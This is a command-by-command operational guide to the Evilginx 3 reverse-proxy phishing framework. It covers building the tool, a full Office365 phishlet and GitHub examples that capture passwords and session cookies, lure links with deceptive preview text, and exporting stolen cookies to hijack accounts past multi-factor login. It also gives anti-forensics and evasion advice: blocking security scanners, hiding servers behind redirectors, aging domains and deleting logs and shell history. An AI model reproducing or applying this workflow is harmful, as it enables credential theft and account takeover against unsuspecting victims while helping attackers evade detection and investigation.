Evilginx 3

Evilginx 3 is a standalone man-in-the-middle phishing framework that uses reverse proxy technology to intercept and modify HTTP/HTTPS traffic in real-time. It captures session tokens and credential interception, effectively bypassing multi-factor authentication by stealing authenticated session cookies after the victim completes the login flow.

Installation

Install Evilginx 3 from the official GitHub repository. The v3 release is still maintained in the evilginx2 repository as the latest version.

# Clone the repository
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2

# Build from source using make
make

# Binary will be in ./bin/evilginx
./bin/evilginx -v

Requirements:

• Go 1.18+ (for building from source)
• Linux/macOS (Windows support via WSL2)
• Root/sudo access for binding to port 443 and 80
• Valid domain and DNS control
• SSL/TLS certificate (auto-provisioned via Let’s Encrypt)

# Install dependencies on Ubuntu/Debian
sudo apt-get install build-essential git golang-go

# Build and install to /usr/local/bin
cd evilginx2 && make && sudo cp bin/evilginx /usr/local/bin/

Quick Start

Launch Evilginx with minimal configuration and interactive command-line interface.

# Run with default config
sudo evilginx

# Run with custom config directory
sudo evilginx -c /path/to/config

# Run in debug mode (verbose output)
sudo evilginx -d

Upon startup, Evilginx listens on 0.0.0.0:443 (HTTPS) and 0.0.0.0:80 (HTTP redirect). Enter the interactive CLI to configure phishlets and manage sessions.

[*] Listening on 0.0.0.0:443 (HTTPS)
[*] Listening on 0.0.0.0:80 (HTTP)
[*] Type 'help' for available commands
evilginx >

Configuration

Core settings for domain, IP address, and redirect handling.

Domain Setup

evilginx > config domain <domain.com>

Set the primary phishing domain used for all phishlets. This domain must have DNS and wildcard DNS records pointing to your Evilginx server.

evilginx > config domain attacker.com
evilginx > config domain
[+] Current domain: attacker.com

IPv4 Configuration

evilginx > config ipv4 <public_ip>

Specify the external IP address for DNS A records and callback URLs. Critical for phishlets to function correctly when behind NAT/proxies.

evilginx > config ipv4 192.0.2.100

Redirect URL

evilginx > config redirect_url <url>

Set the fallback redirect destination after credential capture. Victims who don’t match a phishlet or lure are redirected here to avoid suspicion.

evilginx > config redirect_url https://www.google.com

TLS Certificate

evilginx > config cert <path_to_cert> <path_to_key>

Provide custom SSL certificates. By default, Evilginx auto-generates self-signed certs and provisions Let’s Encrypt certificates for valid domains.

evilginx > config phishlets
[+] Loaded phishlets: 25

Phishlets

Phishlets are YAML blueprints that define how Evilginx proxies a target website. Each phishlet maps legitimate host domains to phishing domains and defines credential capture rules.

Phishlet Structure

name: "Office365"
author: "attacker"
min_ver: "3.1.0"

proxy_hosts:
  - phish_sub: "office"
    orig_sub: ""
    domain: "microsoft.com"
    session: true
    is_api: false
  
  - phish_sub: "login"
    orig_sub: "login"
    domain: "microsoft.com"
    session: true
    is_api: false

sub_filters:
  - triggers_on: "microsoft.com"
    filter_type: "text"
    old_value: "window.location"
    new_value: "window.location_hijacked"

auth_tokens:
  - token_name: "access_token"
    search: "access_token=([^&]+)"
    type: "url_query"

credentials:
  - field: "login"
    search: "username=([^&]+)"
    type: "post"

  - field: "password"
    search: "password=([^&]+)"
    type: "post"

auth_urls:
  - "/login"
  - "/oauth/authorize"

force_post_intercept:
  - path: "/login"
    key: "username"

Loading Phishlets

evilginx > phishlets load
[+] Loaded 25 phishlets from phishlets directory

Phishlets are automatically loaded from the phishlets/ directory on startup. Create custom phishlets or use pre-built ones from the repository.

Phishlet Hostname Configuration

evilginx > phishlets hostname <phishlet> <hostname>

Set the phishing hostname for a phishlet. This is the domain your victim will visit.

evilginx > phishlets hostname office365 office.attacker.com

Enable/Disable Phishlets

evilginx > phishlets enable office365
evilginx > phishlets disable office365
evilginx > phishlets
[+] Enabled:  office365, gmail, okta
[+] Disabled: github, aws

Enable phishlets you want to deploy. Disabled phishlets will not intercept traffic.

Custom Phishlet Development

Create custom phishlets by defining proxy hosts, content filters, and credential capture rules in YAML.

Proxy Hosts (phish_sub, orig_sub, domain):

Map legitimate website subdomains to phishing subdomains. The framework rewrites traffic between them.

proxy_hosts:
  - phish_sub: "accounts"           # subdomain on attacker domain
    orig_sub: "accounts"            # original subdomain on target
    domain: "github.com"            # target domain
    session: true                   # capture session cookies
    is_api: false                   # standard HTTP/HTTPS

Sub Filters (content rewriting):

Modify HTML/JavaScript responses in real-time to redirect victims to your phishing domain.

sub_filters:
  - triggers_on: "github.com"
    filter_type: "text"
    old_value: "github.com"
    new_value: "attacker.com"
    
  - triggers_on: "cdn.github.com"
    filter_type: "regex"
    old_value: "https?://[a-z]+\\.github\\.com"
    new_value: "https://phish.attacker.com"

Auth Tokens (session cookie capture):

Extract and log authenticated session tokens from responses or cookies.

auth_tokens:
  - token_name: "github_session"
    search: "__session=([^;]+)"
    type: "cookie"
  
  - token_name: "api_token"
    search: "token=([^&]+)"
    type: "url_query"
    
  - token_name: "bearer"
    search: "Authorization: Bearer ([^ ]+)"
    type: "header"

Credentials (username/password capture):

Extract credentials from POST requests during login.

credentials:
  - field: "username"
    search: "login=([^&]+)"
    type: "post"
    
  - field: "password"
    search: "password=([^&]+)"
    type: "post"

Auth URLs (trigger points):

Define URL paths where authentication happens to focus credential capture.

auth_urls:
  - "/login"
  - "/session/authenticate"
  - "/oauth/authorize"

Force POST Intercept:

Intercept and log POST requests at specific paths even if credentials aren’t found.

force_post_intercept:
  - path: "/login"
    key: "username"

Lures

Lures are shortened URLs with custom parameters that track victims and control their experience. They’re the actual phishing links you send to targets.

Create Lure

evilginx > lures create <phishlet>

Generate a new lure for a specific phishlet.

evilginx > lures create office365
[+] Lure created: https://attacker.com/F3Dx92k1

Edit Lure

evilginx > lures edit <lure_id> <key> <value>

Add custom parameters to lures for tracking or campaign identification.

evilginx > lures edit F3Dx92k1 param campaign_name marketing_team_1
evilginx > lures edit F3Dx92k1 param tracking_id 12345

Get Lure URL

evilginx > lures get-url <lure_id>
https://attacker.com/F3Dx92k1?campaign_name=marketing_team_1&tracking_id=12345

OG Tags for Link Preview

evilginx > lures edit <lure_id> og-title "Verify Your Account"
evilginx > lures edit <lure_id> og-description "Click here to verify your Microsoft 365 account"
evilginx > lures edit <lure_id> og-image "https://attacker.com/microsoft-preview.png"

Open Graph tags control how the lure appears when shared on social media or messaging apps.

Session Management

Monitor and export captured credentials and session tokens.

View All Sessions

evilginx > sessions
[+] Sessions:
    ID  | Username      | Password       | Tokens
    1   | user@acme.com | P@ssw0rd!      | access_token=xyz123...
    2   | john.doe      | MySecureP@ss   | session_id=abc456...

View Detailed Session

evilginx > sessions <session_id>
[+] Session ID: 1
    Username: user@acme.com
    Password: P@ssw0rd!
    Phishlet: office365
    IP: 203.0.113.42
    User-Agent: Mozilla/5.0 Windows 10
    Cookies: __session=xyz123;secure_token=abc456
    Headers: Authorization: Bearer token_xyz...

Export Sessions

evilginx > sessions export <format>

Export captured credentials and cookies in formats compatible with browser extensions or tools.

# Export as JSON
evilginx > sessions export json > captured_sessions.json

# Export cookies for browser import
evilginx > sessions export cookies > cookies.txt

Import exported cookies into your browser:

# Using browser extension or tools like netscape-cookie-file format
cat cookies.txt | import-to-browser

Blacklisting

Block automated scanners, researchers, and unwanted traffic.

Auto-Redirect Mode

evilginx > blacklist mode
[+] Current mode: redirect

Set blacklist behavior: redirect (send to fallback URL), jail (serve fake page), or none.

Add to Blacklist

evilginx > blacklist add <ip>
evilginx > blacklist add 192.168.1.100

Block specific IPs from accessing your phishlet.

Blacklist by User-Agent

evilginx > blacklist add-ua "curl/7.68"
evilginx > blacklist add-ua "python-requests"

Block common security scanner user agents.

evilginx > blacklist
[+] Blacklisted IPs: 192.168.1.100, 203.0.113.55
[+] Blacklisted User-Agents: curl, python-requests, nmap

DNS Setup

Configure DNS records for your phishing domain to route traffic to Evilginx.

A Record

Point your phishing domain to the Evilginx server IP:

attacker.com    A    192.0.2.100

Wildcard DNS

Create a wildcard record to match all subdomains used by phishlets:

*.attacker.com  A    192.0.2.100

This allows phishlets like office.attacker.com, login.attacker.com, etc., to resolve correctly.

Verification:

nslookup office.attacker.com
# Should resolve to 192.0.2.100

nslookup login.attacker.com
# Should also resolve to 192.0.2.100

TLS/SSL Certificate Management

Evilginx automatically manages SSL certificates for seamless HTTPS proxying.

Automatic Let’s Encrypt

evilginx > config cert auto

Enable automatic certificate provisioning via Let’s Encrypt. Requires valid domain ownership and DNS records.

# Certificates are stored in ./certs/
ls -la certs/
total 32
-rw-r--r-- 1 root root 1234 attacker.com.crt
-rw-r--r-- 1 root root 567  attacker.com.key

Custom Certificates

evilginx > config cert /path/to/cert.crt /path/to/cert.key

Use pre-generated certificates (self-signed or commercial).

# Generate self-signed certificate for testing
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

Certificate Renewal

Let’s Encrypt certificates auto-renew 30 days before expiration. Monitor renewal status:

evilginx > config cert status
[+] Certificate for attacker.com expires in 87 days
[+] Auto-renewal enabled

Token Capture Workflow

Complete attack flow from phishlet setup to browser session hijacking.

1. Create and Enable Phishlet

evilginx > phishlets load
evilginx > phishlets enable office365
evilginx > phishlets hostname office365 office.attacker.com

2. Configure Domain and IP

evilginx > config domain attacker.com
evilginx > config ipv4 192.0.2.100
evilginx > config redirect_url https://www.google.com

3. Set DNS Records

Ensure DNS resolves phishing domain:

office.attacker.com  A  192.0.2.100
*.attacker.com       A  192.0.2.100

4. Create Lure

evilginx > lures create office365
evilginx > lures get-url <lure_id>
https://office.attacker.com/<random_id>

5. Send to Target

Deliver the lure URL via social engineering, email, SMS, etc.

6. Monitor Sessions

evilginx > sessions
[+] New session captured!
    Username: victim@company.com
    Password: [redacted]
    Tokens: access_token=eyJhbGc...

7. Extract and Use Tokens

evilginx > sessions export cookies > cookies.txt

# Import into browser to hijack authenticated session
# Or use tokens with API requests
curl -H "Authorization: Bearer eyJhbGc..." https://api.microsoft.com/me

Infrastructure OPSEC

Operational security considerations for long-term phishing campaigns.

Domain Aging

Use domains registered weeks or months prior to the campaign. Fresh domains are flagged by security tools and email filters.

# Check domain registration date
whois attacker.com | grep "Creation Date"

Domain Categorization

Submit your phishing domain to legitimate categorization services before the campaign to build reputation.

# Check domain reputation
curl https://api.abuseipdb.com/api/v2/check?ipAddress=192.0.2.100

Reverse Proxy Setup

Use a second-stage redirector to hide Evilginx infrastructure:

Target (microsoft.com)
    ↓
Redirector (CloudFlare, cheap VPS)
    ↓
Evilginx Server (well-hardened, behind firewall)

Firewall rules to allow only redirector traffic:

sudo ufw allow from 198.51.100.0/24 to any port 443
sudo ufw allow from 198.51.100.0/24 to any port 80
sudo ufw default deny incoming

Log Retention

Disable or minimize logging to forensic artifacts:

# Clear Evilginx logs regularly
sudo rm -f ~/.evilginx/logs/*

# Disable bash history for sensitive commands
HISTFILE=/dev/null evilginx

Troubleshooting

Certificate Errors in Browser

Browser shows SSL/TLS warnings or “invalid certificate” errors.

Cause: Self-signed certificates or Let’s Encrypt provisioning failure.

Fix:

# Verify Let's Encrypt is working
evilginx > config cert status

# Manually provision certificate
evilginx > config cert /path/to/valid.crt /path/to/valid.key

# Check firewall isn't blocking port 80 (required for ACME validation)
sudo ufw status

Phishlet Not Capturing Credentials

Credentials not logged in sessions despite victim login attempt.

Cause: Incorrect auth_tokens or credentials regex patterns.

Fix:

# Enable debug logging to inspect HTTP traffic
sudo evilginx -d

# Review phishlet definition for typos in regex patterns
cat phishlets/office365.yaml

# Test regex patterns manually
echo "username=victim&password=P@ss" | grep -oP 'password=\K[^&]+'

DNS Resolution Issues

Phishing domain doesn’t resolve or resolves to wrong IP.

Fix:

# Verify DNS propagation
nslookup office.attacker.com

# Force refresh DNS cache
sudo systemctl restart systemd-resolved

# Check /etc/hosts doesn't override DNS
cat /etc/hosts | grep attacker

Evilginx Crashes or High Memory Usage

Process terminates unexpectedly or consumes excessive RAM.

Cause: Large session database or concurrent connection limits.

Fix:

# Monitor resource usage
top -p $(pidof evilginx)

# Increase file descriptor limit
ulimit -n 65536

# Clear old sessions periodically
evilginx > sessions delete <old_session_id>

Best Practices

• Test phishlets locally first — validate credential capture and token extraction before deployment
• Use aged domains — domains registered months prior are less likely flagged
• Monitor session quality — verify captured tokens actually work before relying on them
• Rotate phishing infrastructure — change IPs and domains frequently to evade detection
• Implement fallback redirects — redirect suspicious traffic to legitimate sites to avoid alerting victims
• Use HTTPS consistently — all communication must be encrypted to avoid middle-mile detection
• Clean up regularly — delete old sessions and logs to minimize forensic evidence
• Rate-limit requests — prevent scanning tools from enumerating phishlets
• Deploy behind redirector — never expose Evilginx server directly to targets
• Test token longevity — verify exported session tokens remain valid and aren’t invalidated immediately

Related Tools

GoPhish — Standalone phishing server with email campaign management; easier to use but less powerful than Evilginx for MFA bypass.

Modlishka — Reverse proxy phishing framework similar to Evilginx; supports proxying arbitrary websites without pre-built phishlets.

Muraena — JavaScript-based reverse proxy with advanced credential and session token capture; excellent for complex web applications.

EvilnoVNC — Browser-in-browser phishing attack vector; tricks victims by displaying fake browser windows to capture credentials.

CredSniper — AWS-based credential harvester with built-in email delivery and analytics; cloud-hosted alternative to Evilginx.